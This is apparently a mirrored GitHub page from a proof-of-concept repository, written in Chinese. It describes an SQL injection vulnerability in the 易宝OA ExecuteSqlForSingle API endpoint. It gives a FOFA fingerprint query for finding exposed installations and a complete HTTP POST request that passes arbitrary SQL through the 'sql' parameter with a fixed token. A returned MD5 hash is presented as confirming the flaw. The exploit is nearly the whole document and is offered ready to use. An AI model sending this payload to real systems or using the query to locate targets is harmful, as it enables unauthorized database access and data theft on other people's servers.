mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
20 lines
540 B
Markdown
20 lines
540 B
Markdown
![]() |
## 易宝OA ExecuteSqlForSingle SQL注入漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
"顶讯科技"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
POST /api/system/ExecuteSqlForSingle HTTP/1.1
|
||
|
Host: IP:PORT
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
|
||
|
Content-Length: 103
|
||
|
|
||
|
token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters
|
||
|
```
|
||
|
发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞
|
||
|
|